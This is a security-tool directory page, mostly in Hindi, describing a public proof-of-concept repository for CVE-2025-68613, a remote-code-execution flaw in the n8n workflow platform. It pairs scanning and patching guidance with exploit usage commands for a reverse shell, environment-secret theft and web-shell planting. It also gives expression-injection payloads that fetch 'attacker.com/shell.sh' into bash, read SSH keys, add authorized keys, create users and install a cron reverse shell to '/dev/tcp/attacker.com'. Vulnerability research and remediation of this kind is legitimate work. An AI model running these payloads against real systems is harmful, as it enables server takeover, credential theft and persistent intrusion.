Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68613-POC — CVE-2025-68613 के लिए सार्वजनिक PoC + स्कैनर और शोध: n8n वर्कफ़्लो ऑटोमेशन में एक्सप्रेशन इंजेक्शन के माध्यम से क्रिटिकल RCE (CVSS 10.0)। इसमें डिटेक्शन टूल, पूर्ण एक्सप्लॉइट और सुधार मार्गदर्शन शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/thestingr/cve-2025-68613-poc
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
2638 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
thestingr/cve-2025-68613-poc

CVE-2025-68613-POC

CVE-2025-68613 के लिए सार्वजनिक PoC + स्कैनर और शोध: n8n वर्कफ़्लो ऑटोमेशन में एक्सप्रेशन इंजेक्शन के माध्यम से क्रिटिकल RCE (CVSS 10.0)। इसमें डिटेक्शन टूल, पूर्ण एक्सप्लॉइट और सुधार मार्गदर्शन शामिल हैं।

रिपॉजिटरी देखें

🚨 CVE-2025-68613: n8n में गंभीर RCE भेद्यता

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

विषय सूची

  1. अवलोकन
  2. n8n क्या है?
  3. भेद्यता मूल बातें
  4. तकनीकी विवरण
  5. प्रभावित संस्करण
  6. शोषण तंत्र
  7. वास्तविक दुनिया पर प्रभाव
  8. पता लगाने के तरीके
  9. सुधार और शमन
  10. संसाधन और संदर्भ

अवलोकन

CVE-2025-68613 एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो n8n में खोजी गई है, जो एक लोकप्रिय ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है। यह भेद्यता प्रमाणित उपयोगकर्ताओं को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है, जिससे संभावित रूप से पूरा सिस्टम समझौता हो सकता है।

त्वरित तथ्य

  • CVE ID: CVE-2025-68613
  • CVSS स्कोर: 9.9 - 10.0 (गंभीर)
  • भेद्यता प्रकार: एक्सप्रेशन इंजेक्शन → रिमोट कोड निष्पादन
  • CWE: CWE-913 (गतिशील रूप से प्रबंधित कोड संसाधनों का अनुचित नियंत्रण)
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: हाँ (निम्न विशेषाधिकार - कोई व्यवस्थापक पहुंच आवश्यक नहीं) |- स्थिति: प्रूफ ऑफ कॉन्सेप्ट उपलब्ध (v1.121.0 पर काम करने की पुष्टि)

n8n क्या है?

n8n एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को अनुमति देता है:

  • विभिन्न API, डेटाबेस और सेवाओं को कनेक्ट करना
  • दोहराए जाने वाले व्यावसायिक प्रक्रियाओं को स्वचालित करना
  • व्यापक कोडिंग के बिना जटिल वर्कफ़्लो बनाना
  • ऑन-प्रिमाइसेस या क्लाउड में तैनात करना

n8n महत्वपूर्ण बुनियादी ढांचा क्यों है

संगठन n8n का उपयोग करते हैं:

  • डेटाबेस को क्लाउड सेवाओं के साथ एकीकृत करना
  • डेटा प्रोसेसिंग पाइपलाइनों को स्वचालित करना
  • CRM, ERP और आंतरिक प्रणालियों को कनेक्ट करना
  • संवेदनशील डेटा और API क्रेडेंशियल्स का प्रबंधन करना

आईटी बुनियादी ढांचे में यह केंद्रीय भूमिका भेद्यताओं को विशेष रूप से खतरनाक बनाती है, क्योंकि वे हमलावरों को पूरे नेटवर्क और संवेदनशील डेटा तक पहुंच प्रदान कर सकती हैं।


इस रिपॉजिटरी में उपकरण

इस रिपॉजिटरी में भेद्यता का पता लगाने और शोषण परीक्षण के लिए उपयोग के लिए तैयार उपकरण शामिल हैं:

1. स्कैनर: cve-2025-68613-scanner.py

उद्देश्य: कमजोर n8n इंस्टेंसेस का सुरक्षित, गैर-शोषणकारी पता लगाना

विशेषताएं:

  • HTTP प्रतिक्रियाओं से निष्क्रिय संस्करण पता लगाना
  • कोई प्रमाणीकरण आवश्यक नहीं
  • कोई पेलोड निष्पादन नहीं
  • कई सामान्य पथों की जाँच करता है (/, /rest/settings, /healthz, /api/v1/health)
  • अधिकृत सुरक्षा आकलन के लिए सुरक्षित

उपयोग:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

root@kitploit:~
**आउटपुट**:
- निकास कोड 0: असुरक्षित नहीं
- निकास कोड 1: संस्करण अनिर्धारित (शायद पैच किया गया या छिपा हुआ)
- निकास कोड 2: असुरक्षित संस्करण पाया गया

### 2. न्यूक्ली टेम्पलेट: `CVE-2025-68613.yaml`
**उद्देश्य**: स्वचालित भेद्यता पता लगाना और बुनियादी अभिव्यक्ति मूल्यांकन परीक्षण

**विशेषताएं**:
- मान्य प्रमाणीकरण टोकन आवश्यक है
- अभिव्यक्ति इंजेक्शन क्षमता का परीक्षण करता है
- Node.js वैश्विक संदर्भ (process.platform) को पढ़ने का प्रयास करता है
- RCE वेक्टर को मान्य करने के लिए कार्यप्रवाह बनाता है
- CVSS 10.0 गंभीरता वर्गीकरण

**उपयोग**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. पूर्ण शोषण: exploit_cve-2025-68613.py

उद्देश्य: पूर्ण प्रमाण-सिद्धांत शोषण जिसमें कई आक्रमण पेलोड हैं

विशेषताएँ:

  • पूर्ण प्रमाणीकरण संचालन
  • कई शोषण पेलोड:
    • info: सिस्टम जानकारी एकत्र करें (OS, architecture, Node.js version, current user)
    • cmd: मनमाना सिस्टम कमांड निष्पादित करें
    • env: सभी पर्यावरण चर निकालें (क्रेडेंशियल, API कुंजी, गुप्त डेटा प्रकट करता है)
    • read: फाइलसिस्टम से संवेदनशील फ़ाइलें पढ़ें (SSH कुंजी, कॉन्फ़िग फ़ाइलें, आदि)
    • write: फाइलसिस्टम में फ़ाइलें लिखें (स्थायित्व, बैकडोर, आदि)
    • revshell: इंटरैक्टिव पहुंच के लिए रिवर्स शेल कनेक्शन स्थापित करें
  • स्वचालित वर्कफ़्लो सफाई
  • त्रुटि प्रबंधन और स्थिति रिपोर्टिंग

आवश्यकताएँ:

  • मान्य n8n उपयोगकर्ता क्रेडेंशियल (ईमेल/पासवर्ड)
  • Python 3.6+ और requests लाइब्रेरी के साथ
  • लक्ष्य n8n इंस्टेंस तक नेटवर्क पहुंच

स्थापना:```bash pip install requests chmod +x exploit_cve-2025-68613.py

root@kitploit:~
**उपयोग उदाहरण**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

यह कैसे काम करता है:

  1. प्रदान की गई साख का उपयोग करके n8n में प्रमाणित होता है
  2. एक्सप्रेशन इंजेक्शन पेलोड के साथ एक दुर्भावनापूर्ण वर्कफ़्लो बनाता है
  3. पेलोड this.constructor.constructor() का उपयोग करके एक्सप्रेशन सैंडबॉक्स से बाहर निकलता है
  4. process.platform या अन्य Node.js API के माध्यम से पेलोड को निष्पादित करता है
  5. वर्कफ़्लो निष्पादन से परिणाम प्राप्त करता है
  6. परीक्षण वर्कफ़्लो को हटाकर सफाई करता है

निकास कोड:

  • 0: सफल शोषण
  • 1: प्रमाणीकरण या शोषण विफल

भेद्यता की मूल बातें

समस्या क्या है?

सरल शब्दों में: n8n उपयोगकर्ताओं को डेटा को गतिशील रूप से संसाधित करने के लिए वर्कफ़्लो में एक्सप्रेशन लिखने की अनुमति देता है। हालाँकि, इन एक्सप्रेशनों का मूल्यांकन उचित सैंडबॉक्सिंग के बिना किया जाता है, जिससे हमलावर इच्छित निष्पादन संदर्भ से बाहर निकल सकते हैं और सर्वर पर मनमाना कोड चला सकते हैं।

मुख्य मुद्दा

जब आप n8n में एक वर्कफ़्लो बनाते हैं, तो आप डेटा में हेरफेर करने के लिए "एक्सप्रेशन" का उपयोग कर सकते हैं। ये एक्सप्रेशन एक प्रतिबंधित वातावरण में चलने वाले होते हैं। हालाँकि, भेद्यता से पता चलता है कि ये एक्सप्रेशन अंतर्निहित सिस्टम तक पहुँच सकते हैं, जिससे हमलावर निम्नलिखित कार्य कर सकते हैं:

  1. सिस्टम कमांड निष्पादित करें
  2. सर्वर पर फ़ाइलें पढ़ें/लिखें
  3. पर्यावरण चर (API कुंजियाँ, पासवर्ड, रहस्य) चुराएं
  4. डेटा संशोधित या हटाएं
  5. दीर्घकालिक पहुँच के लिए स्थिरता स्थापित करें

यह इतना खतरनाक क्यों है

  • प्रवेश में कम बाधा: केवल उपयोगकर्ता लॉगिन की आवश्यकता है (कोई विशेष व्यवस्थापक विशेषाधिकार नहीं)
  • व्यापक प्रयोज्यता: कई संगठन गैर-तकनीकी उपयोगकर्ताओं को वर्कफ़्लो बनाने की अनुमति देते हैं
  • उच्च प्रभाव: n8n प्रक्रिया के पूर्ण विशेषाधिकारों के साथ चलता है
  • डेटा पहुँच: n8n के पास उपलब्ध सभी डेटा (डेटाबेस, API, क्रेडेंशियल) तक पहुँच सकता है
  • नेटवर्क स्थिति: n8n अक्सर महत्वपूर्ण बुनियादी ढांचे के केंद्र में स्थित होता है, जो पार्श्व गति को सक्षम बनाता है

तकनीकी विवरण

भेद्यता कैसे काम करती है

चरण 1: वर्कफ़्लो एक्सप्रेशन मूल्यांकन

जब कोई उपयोगकर्ता n8n में एक वर्कफ़्लो बनाता है, तो वे डेटा को संसाधित करने के लिए एक्सप्रेशन का उपयोग कर सकते हैं:``` Input: User creates a workflow with an expression n8n Expression Engine: Evaluates the expression Expected Output: Processed data Actual Output (Vulnerable): Expression execution context not isolated from runtime

root@kitploit:~
#### चरण 2: एक्सप्रेशन इंजेक्शन
एक हमलावर एक दुर्भावनापूर्ण एक्सप्रेशन तैयार करता है जो इच्छित सैंडबॉक्स से बाहर निकल जाता है:```javascript
// Example: Malicious expression in workflow
${require('child_process').execSync('id')}

चरण 3: कोड निष्पादन

अभिव्यक्ति का उचित अलगाव के बिना मूल्यांकन किया जाता है, जिससे हमलावर निम्नलिखित कार्य कर सकता है:

  • सिस्टम फ़ंक्शन कॉल करना
  • शेल कमांड निष्पादित करना
  • फ़ाइल सिस्टम तक पहुँचना
  • पर्यावरण चर पढ़ना

मूल कारण

यह कमजोरी अभिव्यक्ति मूल्यांकन इंजन में अपर्याप्त सैंडबॉक्सिंग के कारण उत्पन्न होती है। n8n टीम ने एक ऐसे संदर्भ में अभिव्यक्तियों का मूल्यांकन किया जो:

  • require() या समान मॉड्यूल लोडिंग फ़ंक्शन तक पहुँच की अनुमति दी
  • सिस्टम API तक पहुँच को उचित रूप से प्रतिबंधित नहीं किया
  • अभिव्यक्ति सिंटैक्स को मान्य या फ़िल्टर नहीं किया
  • प्रोटोटाइप प्रदूषण हमलों को रोका नहीं
  • निष्पादन वातावरण को अंतर्निहित Node.js रनटाइम से अलग नहीं किया

कोड निष्पादन पथ```

User Input (Workflow Expression) ↓ Expression Parser ↓ Evaluation Engine (VULNERABLE - Not Sandboxed) ↓ Direct Access to Node.js Runtime ↓ System Command Execution / File Access / Credential Theft

root@kitploit:~
---

## प्रभावित संस्करण

### कमजोर श्रेणी

**0.211.0** से शुरू होने वाले सभी n8n संस्करण निम्नलिखित संस्करणों तक कमजोर हैं:
- `0.211.0` → `1.120.3`
- `1.121.0`

### पैच किए गए संस्करण

इस कमजोरी को निम्नलिखित में ठीक किया गया है:
- ✅ `1.120.4` और बाद में 1.120.x शाखा में
- ✅ `1.121.1` और बाद में 1.121.x शाखा में
- ✅ `1.122.0` और सभी नए संस्करण

### अपने संस्करण की जांच कैसे करें```bash
# If n8n is running
curl http://your-n8n-instance:5678/ | grep -i "version"

# Or check the admin panel
# Go to Settings → About → Version

परीक्षण किए गए संस्करण और अनुकूलता

सत्यापित कार्यशील

  • n8n v1.121.0: ✅ पूरी तरह से शोषण योग्य (RCE की पुष्टि, एक्सप्रेशन इंजेक्शन कार्यशील)
  • n8n v0.211.0 - v1.120.3: ✅ NVD के अनुसार संवेदनशील सीमा के भीतर (व्यक्तिगत रूप से परीक्षण नहीं किया गया)

ज्ञात समस्याएं

  • REST निष्पादन सीमा: /rest/workflows/{id}/run एंडपॉइंट v1.121.0 में HTTP 500 त्रुटि लौटाता है
    • समाधान: एक्सप्रेशन इंजेक्शन पूरी तरह से काम करता है, RCE की पुष्टि इसके माध्यम से:
      1. UI में मैन्युअल "टेस्ट स्टेप" बटन क्लिक (सिद्ध रूप से कार्यशील)
      2. वर्कफ़्लो आउटपुट कैप्चर
    • यह API सीमा है, एक्सप्लॉइट बग नहीं

परीक्षण नहीं किया गया

  • n8n v0.212.0+: प्रलेखित संवेदनशीलता सीमा से बाहर, संभवतः पैच किया गया (GitHub मुद्दा #1 देखें)
  • विंडोज़ सर्वर परिनियोजन: विंडोज़-विशिष्ट वातावरण पर सीमित परीक्षण डेटा

संस्करण समर्थन कथन

यह एक्सप्लॉइट NVD में प्रलेखित संवेदनशील सीमा के विरुद्ध काम करने के लिए डिज़ाइन किया गया है:

  • पुष्टि की गई संवेदनशील: 0.211.0 से 1.120.3 तक, साथ ही 1.121.0
  • पैच किए गए संस्करण: 1.120.4, 1.121.1, 1.122.0 और बाद के

यदि इस सीमा के बाहर के संस्करणों के विरुद्ध परीक्षण किया जाता है, तो सफलता की गारंटी नहीं है।


शोषण यांत्रिकी

एक हमलावर क्या कर सकता है?

एक बार जब कोई प्रमाणित उपयोगकर्ता (या वैध क्रेडेंशियल वाला हमलावर) इस संवेदनशीलता का शोषण करता है, तो वे निम्नलिखित कर सकते हैं:

1. मनमाने सिस्टम कमांड निष्पादित करें```javascript

${require('child_process').execSync('whoami').toString()} // Returns: root (or whatever user runs n8n)

${require('child_process').execSync('curl attacker.com/shell.sh | bash').toString()} // Downloads and executes a shell script

root@kitploit:~
#### 2. सर्वर से फ़ाइलें पढ़ें```javascript
${require('fs').readFileSync('/etc/passwd', 'utf-8')}
// Reads sensitive system files

${require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf-8')}
// Steals SSH keys

3. पर्यावरण चर पढ़ें```javascript

${Object.keys(process.env).join(', ')} // Lists all environment variables

${process.env.DATABASE_PASSWORD} // Extracts specific secrets

root@kitploit:~
#### 4. दुर्भावनापूर्ण फ़ाइलें लिखना```javascript
${require('fs').writeFileSync('/var/www/shell.php', 'malicious code')}
// Plants a web shell for persistence

${require('fs').writeFileSync('/home/user/.ssh/authorized_keys', 'attacker_key')}
// Adds SSH access

5. कनेक्टेड सेवाओं तक पहुँचें```javascript

// Access workflow credentials (stored API keys, passwords) // Modify or view connected databases // Exfiltrate data from all integrated systems

root@kitploit:~
#### 6. स्थिरता स्थापित करें```javascript
${require('child_process').execSync('echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1" | crontab -')}
// Creates a cron job for reverse shell access

${require('child_process').execSync('useradd -m -s /bin/bash attacker')}
// Creates a new user account

आक्रमण परिदृश्य उदाहरण

वास्तविक-विश्व परिदृश्य: n8n का उपयोग करने वाली कंपनी

  1. हमलावर क्रेडेंशियल प्राप्त करता है: फ़िशिंग, क्रेडेंशियल पुन: उपयोग या कमज़ोर पासवर्ड के माध्यम से
  2. n8n में लॉग इन करता है: वैध उपयोगकर्ता खाते का उपयोग करता है
  3. एक "हानिरहित" वर्कफ़्लो बनाता है: दावा करता है कि यह डेटा प्रोसेसिंग के लिए है
  4. दुर्भावनापूर्ण एक्सप्रेशन इंजेक्ट करता है: वर्कफ़्लो चरण में शोषण को छुपाता है
  5. कोड निष्पादित करता है: n8n प्रक्रिया विशेषाधिकारों के साथ कमांड चलाता है
  6. डेटा चुराता है: API कुंजियाँ, डेटाबेस क्रेडेंशियल, ग्राहक डेटा चुराता है
  7. दृढ़ता स्थापित करता है: बैकडोर स्थापित करता है, नए व्यवस्थापक खाते बनाता है
  8. पार्श्व रूप से चलता है: अन्य सिस्टम तक पहुँचने के लिए चुराए गए क्रेडेंशियल का उपयोग करता है

वास्तविक-विश्व प्रभाव

गोपनीयता प्रभाव (उच्च)

  • वर्कफ़्लो द्वारा संसाधित संवेदनशील डेटा तक पहुँच
  • API कुंजियाँ, डेटाबेस पासवर्ड, एन्क्रिप्शन कुंजियाँ निकालना
  • कॉन्फ़िगरेशन फ़ाइलों, लॉग्स और रहस्यों को पढ़ना
  • डेटा चोरी के माध्यम से संभावित GDPR/अनुपालन उल्लंघन

अखंडता प्रभाव (उच्च)

  • संचालन को तोड़ने के लिए मौजूदा वर्कफ़्लो में संशोधन
  • डेटा को दूषित करने वाले दुर्भावनापूर्ण वर्कफ़्लो का इंजेक्शन
  • डाउनस्ट्रीम सिस्टम को प्रभावित करने वाले वर्कफ़्लो आउटपुट में परिवर्तन
  • स्थायी पहुँच के लिए बैकडोर लगाना

उपलब्धता प्रभाव (उच्च)

  • महत्वपूर्ण वर्कफ़्लो को हटाना, जिससे व्यवसाय में व्यवधान होता है
  • सेवा क्रैश होने के लिए सिस्टम फ़ाइलों में संशोधन
  • दुर्भावनापूर्ण ऑटोमेशन के माध्यम से संसाधनों का ह्रास
  • रैंसम हमले जहाँ हमलावर सिस्टम को पुनर्स्थापित करने के लिए भुगतान की माँग करते हैं

व्यवसाय प्रभाव उदाहरण

विनिर्माण कंपनी

  • n8n ऑर्डर प्रोसेसिंग और इन्वेंट्री प्रबंधन को स्वचालित करता है
  • हमलावर ग्राहक ऑर्डर और आपूर्तिकर्ता जानकारी चुराता है
  • ग्राहकों को गलत उत्पाद भेजने के लिए वर्कफ़्लो में संशोधन करता है
  • परिणाम: ग्राहक विश्वास की हानि, कानूनी दायित्व, संचालन में व्यवधान

वित्तीय सेवाएँ

  • n8n बैंकिंग API और भुगतान प्रसंस्करण को एकीकृत करता है
  • हमलावर API क्रेडेंशियल और प्रमाणीकरण टोकन चुराता है
  • लेन-देन को पुनर्निर्देशित करता है या धोखाधड़ी वाले रिकॉर्ड बनाता है
  • परिणाम: नियामक दंड, ग्राहक मुआवज़ा, प्रतिष्ठा को नुकसान

स्वास्थ्य देखभाल संगठन

  • n8n रोगी डेटा एकीकरण और रिपोर्टिंग को संभालता है
  • हमलावर संरक्षित स्वास्थ्य जानकारी (PHI) तक पहुँचता है
  • चिकित्सा रिकॉर्ड संशोधित करता है या महत्वपूर्ण अलर्ट को ब्लॉक करता है
  • परिणाम: HIPAA उल्लंघन, रोगी को नुकसान, संगठन की देनदारी

पहचान विधियाँ

विधि 1: संस्करण पहचान स्कैनर

सुरक्षित, गैर-शोषणकारी पहचान स्क्रिप्ट (मूल रिपॉजिटरी में शामिल):```bash python3 CVE-2025-68613.py -u http://your-n8n-instance:5678

root@kitploit:~
**आउटपुट उदाहरण**```
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

विधि 2: Nuclei टेम्पलेट का उपयोग करना

Nuclei के साथ स्वचालित स्कैनिंग:```bash

Single target

nuclei -t CVE-2025-68613.yaml -u http://target:5678

Multiple targets from file

nuclei -t CVE-2025-68613.yaml -l targets.txt

root@kitploit:~
**यह कैसे काम करता है**:
1. सामान्य n8n पथों पर HTTP अनुरोध भेजता है
2. HTML/हेडर्स से संस्करण मेटाडेटा निकालता है
3. यदि मौजूद हो तो base64 एन्कोडेड कॉन्फ़िग को डिकोड करता है
4. संस्करण की तुलना कमजोर रेंज से करता है
5. रिपोर्ट करता है कि इंस्टेंस कमजोर है या नहीं

### Method 3: Manual Banner Grabbing```bash
# Check for n8n in HTTP response
curl -s http://target:5678/ | grep -i "n8n"

# Check headers
curl -I http://target:5678/ | grep -i "n8n"

# Check common paths
curl -s http://target:5678/api/v1/health
curl -s http://target:5678/rest/settings
curl -s http://target:5678/healthz

विधि 4: नेटवर्क रिकॉनिसेंस```bash

Find n8n instances using Shodan

shodan search "n8n" --limit 10

Use favicon hash detection

nmap -p 5678 --script http-favicon target.com

root@kitploit:~
### शोषण के संकेत (IOCs)

**लॉग संकेत**:
- वर्कफ़्लो लॉग में असामान्य एक्सप्रेशन मूल्यांकन
- सिस्टम कमांड वाले एक्सप्रेशन त्रुटियाँ
- संवेदनशील फ़ाइलों तक पहुँच (जैसे /etc/passwd संदर्भ)
- n8n प्रक्रिया से अप्रत्याशित प्रक्रिया जन्म

**सिस्टम संकेत**:
- सर्वर पर नए उपयोगकर्ता खाते बनाए गए
- authorized_keys में अप्रत्याशित SSH कुंजियाँ
- नए cron jobs या निर्धारित कार्य
- सिस्टम फ़ाइलों में संशोधन
- n8n सर्वर से रिवर्स शेल कनेक्शन

---

## सुधार एवं शमन

### प्राथमिक समाधान: तत्काल अपग्रेड

**यह भेद्यता का एकमात्र पूर्ण समाधान है।**

#### चरण 1: अपने डेटा का बैकअप लें```bash
# Backup n8n database
cp -r /path/to/n8n/database ./backup/

# Backup workflows
n8n export --backup-dir ./backup/

चरण 2: n8n अपडेट करें

Docker का उपयोग करना (अनुशंसित):```bash

Pull the latest patched version

docker pull n8nio/n8n:1.122.0 # Or later

Stop current instance

docker stop n8n-container

Start with new version

docker run -d --name n8n-patched
-p 5678:5678
-v n8n_data:/home/node/.n8n
n8nio/n8n:1.122.0

root@kitploit:~
**npm का उपयोग करना**:```bash
# Backup first
npm run export --backup

# Update
npm update n8n

# Or specific version
npm install [email protected]

सिस्टम पैकेज मैनेजर का उपयोग करना:```bash

Debian/Ubuntu

sudo apt update && sudo apt upgrade n8n

Or manual download

wget https://github.com/n8n-io/n8n/releases/download/[email protected]/n8n.tar.gz

root@kitploit:~
#### चरण 3: अद्यतन सत्यापित करें```bash
# Check version after update
curl http://localhost:5678/api/v1/health | grep version

# Ensure n8n is running
curl http://localhost:5678/ | grep -i "n8n"

अस्थायी शमन: अपग्रेड करते समय

महत्वपूर्ण: ये कमजोरी को ठीक नहीं करते हैं। केवल अपग्रेड की योजना बनाते समय अस्थायी उपायों के रूप में उपयोग करें।

1. वर्कफ़्लो अनुमतियों को प्रतिबंधित करें```

n8n Admin Panel → Users & Permissions ├── Disable "User Can Create Workflows" for non-admin users ├── Restrict "User Can Edit Workflows" to trusted administrators only ├── Review existing user roles and remove unnecessary permissions └── Audit workflow creators for suspicious accounts

root@kitploit:~
#### 2. कार्यप्रवाह परिवर्तनों की निगरानी करें```
n8n Admin Panel → Settings → Audit Log
├── Enable comprehensive audit logging
├── Monitor for suspicious workflow modifications
├── Alert on expression evaluations in logs
└── Review workflow change history regularly

3. नेटवर्क अलगाव```bash

Restrict n8n network access

sudo ufw default deny incoming sudo ufw allow from 192.168.1.0/24 to any port 5678 # Only internal network sudo ufw enable

Or using iptables

sudo iptables -A INPUT -p tcp --dport 5678 -s 192.168.1.0/24 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 5678 -j DROP

root@kitploit:~
#### 4. n8n को न्यूनतम विशेषाधिकार के साथ चलाएं```bash
# Create dedicated n8n user
sudo useradd -r -s /bin/false n8n-user

# Run n8n as this user
sudo -u n8n-user n8n

# Or in Docker with user specification
docker run -u 1000 n8nio/n8n:latest

5. सशक्त प्रमाणीकरण सक्षम करें```

n8n Admin Panel → Settings → Authentication ├── Enable 2FA for all accounts ├── Enforce strong password policies ├── Review and disable unnecessary service accounts ├── Implement SSO if available └── Disable any guest/demo accounts

root@kitploit:~
#### 6. कंटेनरीकरण और पृथक्करण```bash
# Run n8n in a restricted Docker container
docker run -d \
  --security-opt=no-new-privileges:true \
  --read-only \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --tmpfs /tmp \
  -p 5678:5678 \
  n8nio/n8n:current-version

7. नियमित ऑडिटिंग```bash

Monitor for suspicious activities

Check for new files in n8n directories

find /path/to/n8n -type f -mtime -1

Monitor process activity

ps aux | grep n8n netstat -tlnp | grep n8n

Check for unauthorized SSH keys

cat ~/.ssh/authorized_keys

Review system logs

journalctl -u n8n -n 100

root@kitploit:~
---

## जोखिम मूल्यांकन मैट्रिक्स

| परिदृश्य | जोखिम स्तर | संभावना | प्रभाव | प्राथमिकता |
|----------|-----------|--------|----------|--------|
| अनपैच्ड, इंटरनेट-फेसिंग n8n | गंभीर | उच्च | पूर्ण समझौता | 🔴 तत्काल |
| अनपैच्ड, केवल आंतरिक n8n | उच्च | मध्यम | आंतरिक खतरे का जोखिम | 🟠 उच्च |
| पैच किया गया n8n | निम्न | निम्न | N/A | ✅ हल |
| अनपैच्ड + अनुमति प्रतिबंध | मध्यम | मध्यम | केवल विश्वसनीय उपयोगकर्ताओं तक सीमित | 🟡 मध्यम |

---

## यदि समझौता हो गया है तो चरण-दर-चरण पुनर्प्राप्ति

### तत्काल कार्रवाई (पहला घंटा)
1. **सिस्टम को अलग करें**: नेटवर्क से डिस्कनेक्ट करें
2. **सेवा बंद करें**: `sudo systemctl stop n8n`
3. **लॉग सुरक्षित रखें**: वाइप करने से पहले सभी लॉग का बैकअप लें
4. **टीम को सतर्क करें**: सुरक्षा टीम और प्रबंधन को सूचित करें
5. **दायरे का आकलन करें**: निर्धारित करें कि n8n ने किस डेटा तक पहुँचा

### जाँच (पहला दिन)
1. **ऑडिट लॉग की समीक्षा करें**: संदिग्ध गतिविधियों की जाँच करें
2. **नेटवर्क ट्रैफ़िक का विश्लेषण करें**: डेटा चोरी की तलाश करें
3. **फ़ाइल संशोधनों की जाँच करें**: प्लांटेड बैकडोर खोजें
4. **उपयोगकर्ता खातों की समीक्षा करें**: नए या संशोधित खातों की तलाश करें
5. **क्रेडेंशियल ऑडिट**: n8n द्वारा उपयोग किए गए सभी API कुंजियाँ और पासवर्ड रीसेट करें

### निवारण (दिन 2-7)
1. **पूर्ण सिस्टम पुनर्निर्माण**: केवल अपडेट न करें, स्वच्छ इमेज से पुनर्निर्माण करें
2. **क्रेडेंशियल रोटेशन**: सभी पासवर्ड, API कुंजियाँ, टोकन रीसेट करें
3. **सब कुछ पैच करें**: सभी जुड़े सिस्टम को अपडेट करें
4. **बैकअप से पुनर्स्थापित करें**: समझौते से पहले के स्वच्छ बैकअप का उपयोग करें
5. **सुरक्षा ऑडिट**: पूर्ण सुरक्षा मूल्यांकन करें

### घटना-पश्चात (सप्ताह 2+)
1. **निगरानी लागू करें**: सतत लॉगिंग और अलर्टिंग सेट करें
2. **प्रक्रिया परिवर्तन**: घटना प्रतिक्रिया प्रक्रियाएँ अपडेट करें
3. **उपयोगकर्ता प्रशिक्षण**: टीमों को सुरक्षा सर्वोत्तम प्रथाओं पर शिक्षित करें
4. **भेद्यता स्कैनिंग**: समान मुद्दों के लिए नियमित स्कैन
5. **अनुपालन समीक्षा**: सुनिश्चित करें कि सभी नियम (GDPR, HIPAA, आदि) पूरे हों

---

## आगे बढ़ने के लिए रोकथाम

### n8n के लिए सुरक्षा सर्वोत्तम अभ्यास

1. **n8n को अपडेट रखें**
   - यदि उपलब्ध हो तो स्वचालित अपडेट सक्षम करें
   - n8n सुरक्षा सलाहकारों की सदस्यता लें
   - उत्पादन में डालने से पहले स्टेजिंग में पैच का परीक्षण करें

2. **पहुंच नियंत्रण**
   - न्यूनतम विशेषाधिकार सिद्धांत का उपयोग करें
   - मजबूत पासवर्ड और 2FA आवश्यक करें
   - एंटरप्राइज़ परिनियोजन के लिए SSO लागू करें
   - नियमित पहुँच समीक्षा और ऑडिट

3. **कार्यप्रवाह प्रबंधन**
   - संदिग्ध तर्क के लिए सभी कार्यप्रवाहों की समीक्षा करें
   - कार्यप्रवाहों के लिए कोड समीक्षा प्रक्रिया लागू करें
   - महत्वपूर्ण कार्यप्रवाहों की पहचान के लिए नामकरण परंपराओं का उपयोग करें
   - नियमित रूप से कार्यप्रवाहों का बैकअप लें

4. **क्रेडेंशियल प्रबंधन**
   - कार्यप्रवाहों में कभी क्रेडेंशियल संग्रहीत न करें
